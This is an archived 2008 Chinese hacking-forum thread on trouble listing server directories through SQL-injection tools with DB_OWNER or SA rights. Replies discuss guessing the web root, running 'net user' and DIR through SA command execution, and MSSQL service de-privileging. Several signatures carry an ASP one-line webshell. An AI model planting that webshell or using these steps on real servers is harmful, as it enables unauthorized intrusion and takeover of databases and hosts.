Board logo

标题: [讨论]DB_OWNER权限中或SA权限中列目录的疑惑 [打印本页]

作者: 虚竹    时间: 2008-7-21 00:19     标题: [讨论]DB_OWNER权限中或SA权限中列目录的疑惑

[讨论]DB_OWNER权限中或SA权限中列目录的疑惑
议题作者:sup32n0v4
信息来源:邪恶八进制信息安全团队(www.eviloctal.com

碰到这个问题已经不是第一次了。SA和DBO权限都会碰到。
假如C盘下有16个文件,使用啊D列目录的话,16个文件都是第一个列出来的文件。
而时候NBSI则只列出第一个。

请问这个问题是什么原因,该如何解决?
帖子10 精华0 积分3037 阅读权限100 在线时间6 小时 注册时间2006-11-18 最后登录2008-6-12 查看详细资料引用 报告 回复 TOP 少女暴富的隐秘(图)

ruler
荣誉会员

作者: jimmy    时间: 2008-7-21 00:19

对啊D和NBSI抓下包,了解他们列目录的方法,应该就清楚了

帖子176 精华2 积分415 阅读权限100 在线时间624 小时 注册时间2005-8-10 最后登录2008-7-16 查看详细资料引用 报告 回复 TOP 让女孩一夜变的更有女人味

逗号
晶莹剔透§烈日灼然
作者: 南风    时间: 2008-7-21 00:19

保存目录内容的字段内容不能更新,可以手动更新,遇到过这样的情况,手动更新,然后用NB 猜内容,猜到WEB目录 over
帖子35 精华0 积分114 阅读权限40 在线时间30 小时 注册时间2005-10-16 最后登录2008-5-22 查看详细资料引用 报告 回复 TOP 少女暴富的隐秘(图)

公子メ残
晶莹剔透§烈日灼然
作者: jacky0752    时间: 2008-7-21 00:19

我也遇到过楼主这种问题,不知道如何解决.
楼上说的不大明白,能解释详细些么?<%eval request("悲仅是借口")%>

帖子5 精华0 积分17 阅读权限40 性别男 在线时间0 小时 注册时间2007-7-27 最后登录2007-8-4 查看详细资料引用 报告 回复 TOP

公子メ残
晶莹剔透§烈日灼然
作者: 小狼    时间: 2008-7-21 00:19

补充一下,是SA权限的.
原来还可以在执行CMD命令那用DIR命令去列目录,但现在没有回显了<%eval request("悲仅是借口")%>

帖子5 精华0 积分17 阅读权限40 性别男 在线时间0 小时 注册时间2007-7-27 最后登录2007-8-4 查看详细资料引用 报告 回复 TOP 少女暴富的隐秘(图)

happy61
晶莹剔透§烈日灼然
作者: 我们的约定    时间: 2008-7-21 00:19

很简单
sql2005
帖子6 精华0 积分17 阅读权限40 在线时间29 小时 注册时间2005-9-23 最后登录2008-6-24 查看详细资料引用 报告 回复 TOP 良辰择日,预测咨询,公司改名,权威易经

happy61
晶莹剔透§烈日灼然
作者: 二少    时间: 2008-7-21 00:19

借地方提问
匿名sa权限可以执行命令net user列用户
sql2005 2003系统
但是加用户时出现System error 5 has occurred.
请教是sa权限受限制还是如何?
帖子6 精华0 积分17 阅读权限40 在线时间29 小时 注册时间2005-9-23 最后登录2008-6-24 查看详细资料引用 报告 回复 TOP 让女孩一夜变的更有女人味

hack520
运维管理组

作者: 劲秋    时间: 2008-7-21 00:19

SQLSERVER服务被降权Www.China-Mu.Co.Kr 猪毛奇迹 1.02Q 将带给你无比的震撼。
帖子1082 精华6 积分5597 阅读权限150 性别男 在线时间576 小时 注册时间2005-3-18 最后登录2008-7-2 查看个人网站
查看详细资料引用 报告 回复 TOP

happy61
晶莹剔透§烈日灼然
作者: lisir    时间: 2008-7-21 00:19

能不能详细介绍介绍一下如何设置的
有没有一些别的方法拿权限
帖子6 精华0 积分17 阅读权限40 在线时间29 小时 注册时间2005-9-23 最后登录2008-6-24 查看详细资料引用 报告 回复 TOP

公子メ残
晶莹剔透§烈日灼然
作者: shirley    时间: 2008-7-21 00:19

不大明白5楼的,SQL2005怎么了?
能具体说下思路么?<%eval request("悲仅是借口")%>

帖子5 精华0 积分17 阅读权限40 性别男 在线时间0 小时 注册时间2007-7-27 最后登录2007-8-4 查看详细资料引用 报告 回复 TOP

xxmkf
晶莹剔透§烈日灼然
作者: 痴心de绝对    时间: 2008-7-21 00:19

这种情况现在经常碰到,还是不清楚,能否说的详细些。
帖子1 精华0 积分6 阅读权限40 在线时间12 小时 注册时间2007-8-13 最后登录2008-4-28 查看详细资料引用 报告 回复 TOP

tyyxt
晶莹剔透§烈日灼然
作者: rejions    时间: 2008-7-21 00:19

就是此mssql服务不再是system权启动的,而是系统普通用户组(users)启动的,所以SA权也跟着针对系统来说,就没有相应的system操作权了!
帖子18 精华0 积分65 阅读权限40 在线时间23 小时 注册时间2007-7-20 最后登录2008-5-8 查看详细资料引用 报告 回复 TOP

小小白
晶莹剔透§烈日灼然
作者: 凯宁    时间: 2008-7-21 00:19

俺也碰到过,不知怎么回事
帖子5 精华0 积分20 阅读权限40 在线时间36 小时 注册时间2007-12-17 最后登录2008-1-15 查看详细资料引用 报告 回复 TOP

charley008
晶莹剔透§烈日灼然
作者: fulu    时间: 2008-7-21 00:19

SQL2005 一般只能列第一行。。
遇到几次。。
原理不懂
帖子16 精华0 积分53 阅读权限40 在线时间33 小时 注册时间2005-10-2 最后登录2008-7-7 查看详细资料引用 报告 回复 TOP

无名书生
晶莹剔透§烈日灼然




欢迎光临 【3.A.S.T】网络安全爱好者 (http://3ast.com/) Powered by Discuz! 7.2